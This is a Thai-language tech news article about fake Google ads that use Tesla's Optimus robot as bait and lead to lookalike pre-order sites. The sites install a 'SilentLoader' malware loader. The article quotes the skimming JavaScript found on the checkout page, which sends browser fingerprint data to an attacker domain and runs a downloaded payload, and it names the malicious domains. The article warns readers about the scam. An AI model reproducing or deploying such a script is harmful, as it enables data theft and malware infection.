ดาวน์โหลดโปรแกรมฟรี
       
   สมัครสมาชิก   เข้าสู่ระบบ
ข่าวไอที
 

โฆษณา Tesla Optimus ปลอมกำลังระบาดบน Google แทนที่จะได้ซื้อหุ่น กลับติดมัลแวร์แทน

โฆษณา Tesla Optimus ปลอมกำลังระบาดบน Google แทนที่จะได้ซื้อหุ่น กลับติดมัลแวร์แทน
ภาพจาก : https://www.yardbarker.com/general_sports/articles/teslas_future_tech_just_took_an_unexpected_turn/s1_17693_
เมื่อ :
|  ผู้เข้าชม : 606
เขียนโดย :
0 %E0%B9%82%E0%B8%86%E0%B8%A9%E0%B8%93%E0%B8%B2+Tesla+Optimus+%E0%B8%9B%E0%B8%A5%E0%B8%AD%E0%B8%A1%E0%B8%81%E0%B8%B3%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%A3%E0%B8%B0%E0%B8%9A%E0%B8%B2%E0%B8%94%E0%B8%9A%E0%B8%99+Google+%E0%B9%81%E0%B8%97%E0%B8%99%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%88%E0%B8%B0%E0%B9%84%E0%B8%94%E0%B9%89%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99+%E0%B8%81%E0%B8%A5%E0%B8%B1%E0%B8%9A%E0%B8%95%E0%B8%B4%E0%B8%94%E0%B8%A1%E0%B8%B1%E0%B8%A5%E0%B9%81%E0%B8%A7%E0%B8%A3%E0%B9%8C%E0%B9%81%E0%B8%97%E0%B8%99
A- A+
แชร์หน้าเว็บนี้ :

เมื่อพูดถึงแบรนด์ Tesla หลายคนก็มักจะนึกถึงมหาเศรษฐีอีลอน มัสก์ ที่มาพร้อมกับรถยนต์ไฟฟ้าแบบล้ำ ๆ ที่มีความสามารถในการขับเคลื่อนได้ด้วยตนเอง และแน่นอนแบรนด์ที่ดังขนาดนี้ก็มักจะถูกแอบอ้างบ่อย ๆ ไม่เว้นแม้แต่จากแฮกเกอร์ที่เอาชื่อแบรนด์ไปแอบอ้างปล่อยมัลแวร์

จากรายงานโดยเว็บไซต์ Cyber Security News ได้กล่าวถึงการตรวจพบเจอแคมเปญนกต่อ หรือ Loader ใส่เครื่องของเหยื่อด้วยการปล่อยโฆษณาปลอมอ้างชื่อแบรนด์ Tesla หลอกให้เข้าเว็บไซต์ปลอมที่อ้างว่าสามารถวางเงินมัดจำแบบคืนเงินไม่ได้ 250 ดอลลาร์สหรัฐ (8,112.50 บาท) เพื่อสั่งจองผลิตภัณฑ์ใหม่ล่าสุดของทาง Tesla ซึ่งเป็นหุ่นยนต์ที่มีชื่อว่า Optimus แต่หลังจากทำตามคำสั่งต่าง ๆ ที่อยู่บนเว็บไซต์ สิ่งที่ผู้เยี่ยมชมจะได้รับนั้นคือมัลแวร์ที่ถูกติดตั้งลงบนเครื่อง โดยทางทีมวิจัยจากองค์กร Internet Storm Center ได้คาดการณ์ว่าแคมเปญดังกล่าวนั้นพึ่งเริ่มต้นในช่วงต้นเดือนสิงหาคมที่ผ่านมานี้เอง โดยเป็นการเกาะกระแสการโหมโปรโมตของทาง Tesla ที่ทำให้ผู้คนกลับมาสนใจผลิตภัณฑ์ที่ถูกพัฒนามาอย่างยาวนานและต่อเนื่องอย่าง Optimus อีกครั้ง

บทความเกี่ยวกับ Tesla อื่นๆ

โดยขั้นตอนการทำงานของแคมเปญดังกล่าวนั้น แฮกเกอร์จะทำการจดทะเบียนชื่อโดเมนที่คล้ายกับทาง Tesla อย่าง offers-tesla[.]com และ exclusive-tesla[.]com เพื่อให้การหลอกลวงเหยื่อนั้นมีความแนบเนียน และเพื่อการหลบเลี่ยงที่จะถูกกลั่นกรองโดยเครื่องมือกลั่นกรองอีเมล (Email Filter) และ เครื่องมือสอดส่องโซเชียลมีเดีย (Social Media Monitoring) ถ้าทำการหลอกลวงแบบวิธีการ Phishing แบบทั่วไป ทางทีมแฮกเกอร์จึงใช้งานเครื่องมืออย่าง Google Ads เพื่อทำการหลอกลวงด้วยการยิงโฆษณาปลอม ๆ ขึ้นหน้าค้นหาบน Google แทน

โฆษณา Tesla Optimus ปลอมกำลังระบาดบน Google แทนที่จะได้ซื้อหุ่น กลับติดมัลแวร์แทน
ภาพจาก : https://cybersecuritynews.com/hackers-poison-google-paid-ads-with-fake-tesla-websites/

ซึ่งถ้าเหยื่อทำการคลิ๊กโฆษณาปลอมเหล่านั้นแล้ว ตัวโฆษณาจะพาเหยื่อไปยังเพจปลอมปลายทางที่มีฟอร์มสำหรับทำการกรอกเพื่อสั่งซื้อสินค้าล่วงหน้า (Pre-Order) ที่คล้ายคลึงกับฟอร์มทั่วไปที่ใช้งานกันตามเว็บไซต์สั่งซื้อสินค้าแบบจองล่วงหน้า แต่แท้ที่จริงแล้วซึ่งภายในนั้นจะมีการซ่อนสคริปท์อันตรายในรูปแบบ JavaScript ไว้ ที่จะมีการทำงานหลังจากกด Submit โดยแทนที่ตัวฟอร์มจะทำการทดลองตัดบัตรเครดิตตามเลขบัตรที่ลงไว้ สคริปท์กลับทำการเก็บข้อมูลเฉพาะทั้งหมดของผู้ใช้งานที่อยู่บนเว็บเบราว์เซอร์ พร้อมทั้งทำการดาวน์โหลดมัลแวร์ Loader ลงมายังเครื่องอยู่เพื่อทำการติดตั้งแทน ซึ่งตัวสคริปท์ที่ทางทีมวิจัยพบบนหน้า Checkout ของเว็บไซต์ปลอมสำหรับกระทำการดังกล่าวนั้นมีดังนี้

(function(){

    var xhr = new XMLHttpRequest();

    xhr.open('POST', 'https://caribview.info/tesla/api/config', true);

    xhr.onload = function(){  

        var cipher = new Uint8Array(xhr.response);

        var config = decryptConfig(cipher, key);

        executePayload(config.loaderUrl);

    };

    xhr.responseType = 'arraybuffer';

    xhr.send(collectBrowserFingerprint());

})();

ตัวมัลแวร์นั้น ทางทีมวิจัยได้เปิดเผยว่า มัลแวร์ดังกล่าวนั้นเป็นมัลแวร์ Loader ในตระกูล “SilentLoader” ที่จะทำหน้าที่ในการดึงโมดูล (Module) ต่าง ๆ ของมัลแวร์ลงมาจากโดเมนที่แฮกเกอร์ตั้งค่าไว้อย่าง caribview[.]info ซึ่งจากการวิเคราะห์แล้วการตรวจตรวจพบว่าตัวมัลแวร์จะร้องขอ และรับไฟล์ผ่านทาง Request ในรูปแบบ HTTP Post ซึ่งหลังจากที่ได้รับตัวไฟล์มัลแวร์มาแล้ว ตัว Loader จะทำหน้าที่ในการถอดรหัส และรันลงบนหน่วยความจำ (In-Memory Execution) โดยตรงทำให้ไม่เหลือร่องรอยการทำงานของมัลแวร์บนฮาร์ดดิสก์ไว้ให้ตรวจสอบหรือตรวจจับได้ ซึ่งหลังจากที่ตัวมัลแวร์ได้ฝังตัวลงบนหน่วยความจำได้สำเร็จแล้ว ตัวมัลแวร์ก็จะทำการใช้วิธีการ DLL Injection ลงบนเว็บเบราว์เซอร์ของเหยื่อเพื่อที่จะได้รับสิทธิ์ในการรันโค้ดต่าง ๆ โดยที่ไม่ต้องเขียนลงฮาร์ดดิสก์ซึ่งจะถูกนำไปใช้ในการรันมัลแวร์ตัวจริงในระลอกต่อไปอีกทีหนึ่ง

เรียกได้ว่าวิธีการหลอกลวงด้วยโฆษณาปลอมนั้นเป็นวิธีการที่ทำได้ง่าย แต่ก็ยังมีผู้ตกเป็นเหยื่อได้เรื่อย ๆ และแฮกเกอร์ก็ยังคงนิยมใช้งานอยู่ ดังนั้นทางทีมข่าวขอให้ผู้อ่านนั้นมีวิจารณญาณในการใช้งาน Search Engine แต่มีความรอบคอบทุกครั้งเวลาที่จะมีการคลิ๊กโฆษณาที่ปรากฏขึ้นบนหน้าจอหลังการค้นหา


ที่มา : cybersecuritynews.com

0 %E0%B9%82%E0%B8%86%E0%B8%A9%E0%B8%93%E0%B8%B2+Tesla+Optimus+%E0%B8%9B%E0%B8%A5%E0%B8%AD%E0%B8%A1%E0%B8%81%E0%B8%B3%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%A3%E0%B8%B0%E0%B8%9A%E0%B8%B2%E0%B8%94%E0%B8%9A%E0%B8%99+Google+%E0%B9%81%E0%B8%97%E0%B8%99%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%88%E0%B8%B0%E0%B9%84%E0%B8%94%E0%B9%89%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99+%E0%B8%81%E0%B8%A5%E0%B8%B1%E0%B8%9A%E0%B8%95%E0%B8%B4%E0%B8%94%E0%B8%A1%E0%B8%B1%E0%B8%A5%E0%B9%81%E0%B8%A7%E0%B8%A3%E0%B9%8C%E0%B9%81%E0%B8%97%E0%B8%99
แชร์หน้าเว็บนี้ :
Keyword คำสำคัญ »
เขียนโดย
นักเขียน : Editor    นักเขียน
 
 
 

ข่าวไอทีที่เกี่ยวข้อง

 


 

แสดงความคิดเห็น